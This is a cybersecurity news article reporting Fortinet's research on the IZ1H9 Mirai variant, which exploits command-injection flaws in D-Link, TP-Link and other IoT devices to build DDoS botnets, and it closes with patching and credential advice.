Attackers find new ways to zombify your router: D-Link, TP-link devices affected

A large-scale attack campaign is targeting routers and turning thousands of them into bots for DDoS attacks, Fortinet researchers have found.

Thirteen payloads were included in the variant of Mirai, a fairly old type of malware that’s used to target networked Linux devices and turn them into remotely controlled bots. Each new payload is specifically adapted to target D-Link devices, Netis wireless routers, Sunhillo SureLine software, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and Totolink routers.

Dubbed IZ1H9, the Mirai variant turns routers and other IoT devices into remote-controlled bots for large-scale network attacks.

Attackers incorporate the zombie routers into botnets, enabling them to launch further attacks like DDoS and brute-force attacks.

Telemetry shows that many thousands of routers, such as TP-Link Archer AX21s, were affected by unauthenticated command injections.

Peak exploitation occurred on September 6th, with trigger counts recorded by Fortinet IPS signatures ranging from the thousands to even tens of thousands.

Affected devices
Image by Fortinet.

The impact of the IZ1H9 campaign is amplified by the rapid updates to the vulnerabilities it exploits.

“This highlights the campaign's capacity to infect vulnerable devices and dramatically expand its botnet through the swift utilization of recently released exploit code, which encompasses numerous CVEs (Common Vulnerabilities and Exposures),” researchers write.

D-Link devices are targeted the most, with four new critical-severity vulnerabilities that allow remote attackers to deliver command injection via a crafted request.

After the payload is injected and executed, it starts by deleting logs to conceal its actions. It then downloads and executes various bot clients to cater to diverse Linux architectures. In the final step, the shell script downloader obstructs network connections on multiple ports.

“IoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the most common and concerning threats to both IoT devices and Linux servers. The exposure of vulnerable devices can result in severe security risks. Despite the availability of patches for these vulnerabilities, the number of exploit triggers remains alarmingly high, often numbering in the thousands,” Fortinet warns.

To counter this threat, they recommend promptly applying patches and always making sure to change default login credentials.

More from Cybernews:

Exposed security cameras in Israel and Palestine posing significant risks

Experiment: anti-Pegasus box to keep spies away from my home

Killnet’s attacks on Israel: an invitation to open fire

X’s misinformation problem laid bare amid Israel-Hamas conflict

Israel’s government and media websites hit with cyberattacks

Subscribe to our newsletter

Leave a Reply

Your email address will not be published. Required fields are markedmarked